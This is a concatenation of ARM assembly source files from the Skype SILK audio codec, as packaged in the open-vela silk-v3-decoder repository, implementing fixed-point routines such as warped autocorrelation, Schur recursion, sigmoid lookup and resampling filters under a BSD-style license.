notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF x0, r4
VARDEF nrg_tmp, r5
VARDEF shift, r6
VARDEF nrg, _r7
VARDEF idx, r8
.globl SYM(SKP_Silk_sum_sqr_shift)
SYM(SKP_Silk_sum_sqr_shift):
stmdb sp!, {r4-r8, fp, ip, lr}
add fp, sp, #28
mov idx, r3
ands nrg_tmp, r2, #2
mov nrg, #0
#ifdef _WINRT
beq LR(6, f)
ldrh x0, [r2], #2
smulbb nrg, x0, x0
sub idx, idx, #1
L(6)
#else
ldrneh x0, [r2], #2
smulbbne nrg, x0, x0
subne idx, idx, #1
#endif
ldr r4, [r2], #4
mov shift, #0
sub idx, idx, #1
L(0)
subs idx, idx, #2
SKP_SMLAD nrg, x0, x0, nrg
#ifdef _WINRT
ldrgt x0, [r2]
addgt r2, r2, #4
#else
ldrgt x0, [r2], #4
#endif
cmp nrg, #0
blt LR(1, f)
cmp idx, #0
bgt LR(0, b)
beq LR(4, f)
b LR(5, f)
L(1)
mov nrg, nrg, lsr #2
mov shift, #2
cmp idx, #0
beq LR(4, f)
blt LR(5, f)
L(3)
subs idx, idx, #2
SKP_SMUAD nrg_tmp, x0, x0
#ifdef _WINRT
ldrgt x0, [r2]
addgt r2, r2, #4
mov nrg_tmp, nrg_tmp, lsr shift
adds nrg, nrg, nrg_tmp
#else
ldrgt x0, [r2], #4
add nrg, nrg, nrg_tmp, lsr shift
cmp nrg, #0
#endif
movlt nrg, nrg, lsr #2
addlt shift, shift, #2
cmp idx, #0
bgt LR(3, b)
blt LR(5, f)
L(4)
ldrh x0, [r2]
smulbb nrg_tmp, x0, x0
#ifdef _WINRT
mov nrg_tmp, nrg_tmp, lsr shift
add nrg, nrg, nrg_tmp
#else
add nrg, nrg, nrg_tmp, lsr shift
#endif
L(5)
ands nrg_tmp, nrg, #0xC0000000
movne nrg, nrg, lsr #2
addne shift, shift, #2
str shift, [r1]
str nrg, [r0]
ldmia sp!, {r4-r8, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 7,104 | silk/src/SKP_Silk_warped_autocorrelation_FIX_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#define QC 10
#define QS 14
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 6 )
VARDEF tmp1_QS, r4
VARDEF length, r5
VARDEF state_QS_ptr, r6
VARDEF val_i, _r7
VARDEF tmp3, r8
VARDEF tmp4, sb
VARDEF corr_QC_ptr, sl
VARDEF state_QS1, ip
VARDEF state_QS2, lr
VARDEF ret0, r0
VARDEF ret1, r1
VARDEF state_QS0, r2
VARDEF warping_Q16, r3
.set sp_state_QS, 0
.set sp_corr_QS, 68
.set sp_corr_ptr, 204
.set sp_scale_ptr, 208
.set sp_input_ptr, 212
.globl SYM(SKP_Silk_warped_autocorrelation_FIX)
SYM(SKP_Silk_warped_autocorrelation_FIX):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #216
.set ptr_length, 256
.set ptr_order, 260
.set ptr_tmp1_QS, 264
.set ptr_state_QS, 268
.set ptr_corr_QC, 272
str r0, [sp, #sp_corr_ptr]
str r1, [sp, #sp_scale_ptr]
add state_QS_ptr, sp, #sp_state_QS
add corr_QC_ptr, sp, #sp_corr_QS
mov r4, #0
mov r5, #0
mov _r7, #17
L(2)
subs _r7, _r7, #1
str r4, [state_QS_ptr], #4
stmia corr_QC_ptr!, {r4, r5}
bgt LR(2, b)
ldr length, [sp, #ptr_length]
/*OUTTER_LOOP*/
L(1)
ldrsh tmp1_QS, [r2], #2
add state_QS_ptr, sp, #sp_state_QS
add corr_QC_ptr, sp, #sp_corr_QS
ldr val_i, [sp, #ptr_order]
str r2, [sp, #sp_input_ptr]
mov tmp1_QS, tmp1_QS, lsl #14
sub val_i, val_i, #2
ldr state_QS1, [state_QS_ptr], #4
ldr state_QS2, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
sub ret0, state_QS2, tmp1_QS
mov state_QS0, tmp1_QS
smull tmp3, tmp4, tmp1_QS, state_QS0
smlawb tmp1_QS, ret0, warping_Q16, state_QS1
ldmia corr_QC_ptr, {ret0, ret1}
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
stmia corr_QC_ptr!, {ret0, ret1}
ldr state_QS1, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
sub ret0, state_QS1, tmp1_QS
smull tmp3, tmp4, tmp1_QS, state_QS0
smlawb tmp1_QS, ret0, warping_Q16, state_QS2
ldmia corr_QC_ptr, {ret0, ret1}
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
stmia corr_QC_ptr!, {ret0, ret1}
/*INNER_LOOP*/
L(0)
ldr state_QS2, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
smull tmp3, tmp4, tmp1_QS, state_QS0
ldmia corr_QC_ptr, {ret0, ret1}
sub tmp1_QS, state_QS2, tmp1_QS
smlawb tmp1_QS, tmp1_QS, warping_Q16, state_QS1
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
ldr state_QS1, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
stmia corr_QC_ptr!, {ret0, ret1}
smull tmp3, tmp4, tmp1_QS, state_QS0
ldmia corr_QC_ptr, {ret0, ret1}
sub tmp1_QS, state_QS1, tmp1_QS
smlawb tmp1_QS, tmp1_QS, warping_Q16, state_QS2
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
subs val_i, val_i, #2
stmia corr_QC_ptr!, {ret0, ret1}
bgt LR(0, b)
str tmp1_QS, [state_QS_ptr, #-4]
smull tmp3, tmp4, tmp1_QS, state_QS0
ldmia corr_QC_ptr, {ret0, ret1}
ldr r2, [sp, #sp_input_ptr]
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
subs length, length, #1
stmia corr_QC_ptr!, {ret0, ret1}
bgt LR(1, b)
ldr r4, [sp, #sp_corr_ptr]
ldr state_QS_ptr, [sp, #sp_scale_ptr]
add corr_QC_ptr, sp, #sp_corr_QS
ldr val_i, [sp, #ptr_order]
ldmia corr_QC_ptr!, {state_QS1, state_QS2}
cmp state_QS2, #0
clz tmp3, state_QS1
clz tmp4, state_QS2
#ifdef _WINRT
bne LR(6, f)
add tmp4, tmp3, #32
L(6)
#else
addeq tmp4, tmp3, #32
#endif
sub tmp4, tmp4, #35
cmn tmp4, #22
#ifdef _WINRT
bge LR(6, f)
mov tmp4, #-22
L(6)
cmp tmp4, #20
ble LR(6, f)
mov tmp4, #20
L(6)
#else
movlt tmp4, #-22
cmp tmp4, #20
movgt tmp4, #20
#endif
add tmp3, tmp4, #10
rsb tmp3, tmp3, #0
str tmp3, [state_QS_ptr]
cmp tmp4, #0
bge LR(3, f)
rsb tmp4, tmp4, #0
rsb tmp3, tmp4, #32
mov state_QS2, state_QS2, lsl tmp3
mov state_QS1, state_QS1, lsr tmp4
orr state_QS1, state_QS1, state_QS2
ldmia corr_QC_ptr!, {r0, r1, r2, r3}
str state_QS1, [r4], #4
L(4)
subs val_i, val_i, #2
mov r0, r0, lsr tmp4
#ifdef _WINRT
mov state_QS1, r1, lsl tmp3
orr state_QS1, r0, state_QS1
#else
orr state_QS1, r0, r1, lsl tmp3
#endif
mov r2, r2, lsr tmp4
#ifdef _WINRT
mov state_QS2, r3, lsl tmp3
orr state_QS2, r2, state_QS2
#else
orr state_QS2, r2, r3, lsl tmp3
#endif
#ifdef _WINRT
ble LR(6, f)
ldmia corr_QC_ptr!, {r0, r1, r2, r3}
stmia r4!, {state_QS1, state_QS2}
b LR(4, b)
L(6)
stmia r4!, {state_QS1, state_QS2}
#else
ldmgtia corr_QC_ptr!, {r0, r1, r2, r3}
stmia r4!, {state_QS1, state_QS2}
bgt LR(4, b)
#endif
add sp, sp, #216
ldmia sp!, {r4-r10, fp, ip, pc}
L(3)
mov state_QS1, state_QS1, lsl tmp4
ldr r1, [corr_QC_ptr], #8
ldr r3, [corr_QC_ptr], #8
str state_QS1, [r4], #4
L(5)
subs val_i, val_i, #2
mov r0, r1, lsl tmp4
mov r2, r3, lsl tmp4
#ifdef _WINRT
ble LR(6, f)
ldr r1, [corr_QC_ptr], #8
ldr r3, [corr_QC_ptr], #8
stmia r4!, {r0, r2}
b LR(5, b)
L(6)
stmia r4!, {r0, r2}
#else
ldrgt r1, [corr_QC_ptr], #8
ldrgt r3, [corr_QC_ptr], #8
stmia r4!, {r0, r2}
bgt LR(5, b)
#endif
add sp, sp, #216
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 2,966 | silk/src/SKP_Silk_sigm_Q15_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=4
VARDEF ptr_slope, r6
VARDEF ptr_LUT, _r7
VARDEF in_Q5, r1
VARDEF ind, r2
VARDEF val_slope, r5
VARDEF val_PUT, r4
VARDEF in_Q5_tmp, r3
.globl SYM(SKP_Silk_sigm_Q15)
SYM(SKP_Silk_sigm_Q15):
stmdb sp!, {r4-r7, fp, ip, lr}
add fp, sp, #24
cmp r0, #0
ldr ptr_slope, TABLE(L0, =SKP_Silk_sigm_tab)
mov in_Q5, r0
rsblt in_Q5, r0, #0
mov r0, #32768
addlt ptr_slope, ptr_slope, #24
movlt r0, #1
add ptr_LUT, ptr_slope, #12 /*sigm_LUT_pos_Q15*/
cmp in_Q5, #192 /*6*32*/
sub r0, r0, #1
bge LR(1, f)
mov ind, in_Q5, asr #5 /*ind*/
mov ind, ind, lsl #1
and in_Q5_tmp, in_Q5, #0x1F
ldrsh val_slope, [ptr_slope, ind] /*sigm_LUT_slope_Q10*/
ldrsh val_PUT, [ptr_LUT, ind] /*sigm_LUT_pos/neg_Q15*/
mla r0, val_slope, in_Q5_tmp, val_PUT
L(1)
ldmia sp!, {r4-r7, fp, ip, pc}
L(L0)
DCD SYM(SKP_Silk_sigm_tab)
SKP_TABLE SKP_Silk_sigm_tab, 2
DCW 237, 153, 73, 30, 12, 7, \
16384, 23955, 28861, 31213, 32178, 32548, \
-237, -153, -73, -30, -12, -7, \
16384, 8812, 3906, 1554, 589, 219
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 5,346 | silk/src/SKP_Silk_schur64_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=6
VARDEF ptr_rc, r4
VARDEF ptr_C0, r3
VARDEF val_C0, _r7
VARDEF ptr_C1, _r7
VARDEF val_a32, r0
VARDEF val_b32, r1
VARDEF val_a32_tmp, r2
VARDEF val_b32_tmp, r3
VARDEF a_headrm, r0
VARDEF b_headrm, r1
VARDEF a32_nrm, r5
VARDEF b32_nrm, sl
VARDEF headrm_tmp, r8
VARDEF result, r1
VARDEF tmp0, r2
VARDEF lshift, r3
VARDEF rc_tmp_Q31, r0
VARDEF tmp1, r1
VARDEF val_rc, r2
VARDEF ptr_C2, r8
VARDEF ptr_C3, sb
VARDEF val_C2, r1
VARDEF val_C3, r2
VARDEF out_C2, r5
VARDEF out_C3, sl
VARDEF order1, r6
VARDEF order2, r3
EXTERN SYM(SKP_DIV32_arm)
.set sp_ptr_C, 0
.globl SYM(SKP_Silk_schur64)
SYM(SKP_Silk_schur64):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #136
mov ptr_rc, r0 /*rc_Q16*/
mov order1, r2 /*order*/
mov ptr_C0, sp
ldr val_C0, [r1], #4
L(0)
subs r2, r2, #1
str val_C0, [ptr_C0], #4
str val_C0, [ptr_C0], #4
ldr val_C0, [r1], #4
bgt LR(0, b)
str val_C0, [ptr_C0], #4
str val_C0, [ptr_C0], #4
add ptr_C1, sp, #8
L(1)
ldr val_a32, [ptr_C1], #8
ldr val_b32, [sp, #4]
rsb val_a32, val_a32, #0 /*-C[k + 1][0]*/
mov val_a32_tmp, val_a32 /*a32*/
mov val_b32_tmp, val_b32 /*b32*/
cmp val_a32, #0
rsblt val_a32, val_a32_tmp, #0 /*a_headrm*/
clz a_headrm, val_a32
cmp val_b32, #0
rsblt val_b32, val_b32_tmp, #0 /*b_headrm*/
clz b_headrm, val_b32
sub a_headrm, a_headrm, #1
sub b_headrm, b_headrm, #1
mov a32_nrm, val_a32_tmp, lsl a_headrm /*a32_nrm*/
mov b32_nrm, val_b32_tmp, lsl b_headrm /*b32_nrm*/
sub headrm_tmp, a_headrm, b_headrm /*a_headrm - b_headrm*/
mvn r0, #0x80000000 /*r0 = 0x7FFF FFFF*/
mov r1, b32_nrm, asr #16 /*SKP_RSHIFT(b32_nrm, 16)*/
mov r0, r0, asr #2
// registers need to preserve: ptr_rc (r4)
// a32_nrm (r5)
// order1 (r6)
// ptr_C1 (r7)
// headrm_tmp (r8)
// b32_nrm (sl)
bl SYM(SKP_DIV32_arm)
smulwb result, a32_nrm, r0 /*result = SKP_SMULWB(a32_nrm, b32_inv);*/
smmul tmp0, b32_nrm, result /*SKP_SMMUL(b32_nrm, result)*/
sub a32_nrm, a32_nrm, tmp0, lsl #3 /*a32_nrm -= SKP_LSHIFT_ovflw( SKP_SMMUL(b32_nrm, result), 3 );*/
smlawb result, a32_nrm, r0, result /*result = SKP_SMLAWB(result, a32_nrm, b32_inv);*/
subs lshift, headrm_tmp, #2 /*lshift= 29 + a_headrm - b_headrm - Qres;*/
rsble lshift, lshift, #0
#ifdef _WINRT
bgt LR(3, f)
mov rc_tmp_Q31, result, lsl lshift
b LR(4, f)
L(3)
mov rc_tmp_Q31, result, asr lshift
L(4)
#else
movle rc_tmp_Q31, result, lsl lshift
movgt rc_tmp_Q31, result, asr lshift
#endif
mov tmp1, rc_tmp_Q31, asr #14 /*SKP_RSHIFT_ROUND( rc_tmp_Q31, 15 )*/
add val_rc, tmp1, #1
mov val_rc, val_rc, asr #1
str val_rc, [ptr_rc], #4
mov order2, order1 /*order-k*/
sub ptr_C2, ptr_C1, #8 /*r8 = &C[k+1][0]*/
add ptr_C3, sp, #4 /*sb = &C[0][1]*/
L(2)
ldr val_C2, [ptr_C2]
ldr val_C3, [ptr_C3]
subs order2, order2, #1
mov out_C2, val_C2, lsl #1
mov out_C3, val_C3, lsl #1
smmul out_C2, out_C2, rc_tmp_Q31
smmul out_C3, out_C3, rc_tmp_Q31
add out_C2, out_C2, val_C3
add out_C3, out_C3, val_C2
str out_C2, [ptr_C3], #8
str out_C3, [ptr_C2], #8
bgt LR(2, b)
subs order1, order1, #1
bgt LR(1, b)
ldr r0, [sp, #4] /*r0 = C[0][1]*/
add sp, sp, #136
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 2,632 | silk/src/SKP_Silk_resampler_private_AR2_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF len, r4
VARDEF S_0, r5
VARDEF S_1, r6
VARDEF in0, _r7
VARDEF out32, r8
VARDEF A_Q140, sb
VARDEF A_Q141, sl
.set sp_S, 0
.globl SYM(SKP_Silk_resampler_private_AR2)
SYM(SKP_Silk_resampler_private_AR2):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #4
.set sp_len, 44
str r0, [sp, #sp_S]
ldr S_0, [r0], #4
ldr S_1, [r0], #-4
ldr len, [sp, #sp_len]
ldrsh A_Q140, [r3], #2
ldrsh A_Q141, [r3]
cmp len, #0
beq LR(1, f)
L(0)
ldrsh in0, [r2], #2
add out32, S_0, in0, lsl #8
str out32, [r1], #4
subs len, len, #1
mov out32, out32, lsl #2
smlawb S_0, out32, A_Q140, S_1
smulwb S_1, out32, A_Q141
bgt LR(0, b)
str S_0, [r0], #4
str S_1, [r0]
L(1)
add sp, sp, #4
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,613 | silk/src/SKP_Silk_resampler_private_ARMA4_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF len, r0
VARDEF S_0, r3
VARDEF S_1, r4
VARDEF S_2, r5
VARDEF S_3, r6
VARDEF in, _r7
VARDEF out1, r8
VARDEF coef01, sb
VARDEF coef23, sl
VARDEF coef45, ip
VARDEF coef6, r8
VARDEF coef_tmp, _r7
VARDEF out2, lr
.set sp_S, 0
.set sp_coef, 4
.globl SYM(SKP_Silk_resampler_private_ARMA4)
SYM(SKP_Silk_resampler_private_ARMA4):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #8
.set sp_len, 48
ldr lr, [sp, #sp_len]
ldrh coef01, [r3], #2
ldrh S_1, [r3], #2
ldrh coef23, [r3], #2
ldrh S_2, [r3], #2
ldrh coef45, [r3], #2
ldrh S_3, [r3], #2
ldrh coef6, [r3], #2
cmp lr, #0
str r0, [sp, #sp_S]
beq LR(1, f) // if len==0
str coef6, [sp, #sp_coef]
ldrsh in, [r2], #2
add coef01, coef01, S_1, lsl #16
add coef23, coef23, S_2, lsl #16
add coef45, coef45, S_3, lsl #16
ldmia r0, {S_0, S_1, S_2, S_3}
mov len, lr
L(0)
mov in, in, lsl #8
add out1, in, S_0, lsl #2
add out2, out1, S_2, lsl #2
smlawb S_0, in, coef01, S_1
smlawb S_0, out1, coef23, S_0
smlawt S_2, out1, coef01, S_3
smlawb S_2, out2, coef45, S_2
smulwt S_1, out1, coef23
smulwt S_3, out2, coef45
add S_1, S_1, in, asr #2
ldr coef_tmp, [sp, #sp_coef]
add S_3, S_3, out1, asr #2
mov out1, #128
smlawb out1, out2, coef_tmp, out1
#if EMBEDDED_ARM<6
cmp out1, #0x800000
movge out1, #0x800000
subge out1, out1, #1
cmn out1, #0x800000
movlt out1, #0x800000
mov out1, out1, asr #8
#else
ssat out1, #16, out1, asr #8
#endif
subs len, len, #1
strh out1, [r1], #2
#ifdef _WINRT
ble LR(1, f)
ldrsh in, [r2], #2
b LR(0, b)
L(1)
#else
ldrgtsh in, [r2], #2
bgt LR(0, b)
#endif
ldr r0, [sp, #sp_S]
stmia r0, {S_0, S_1, S_2, S_3}
L(1)
add sp, sp, #8
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 2,964 | silk/src/SKP_Silk_A2NLSF_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
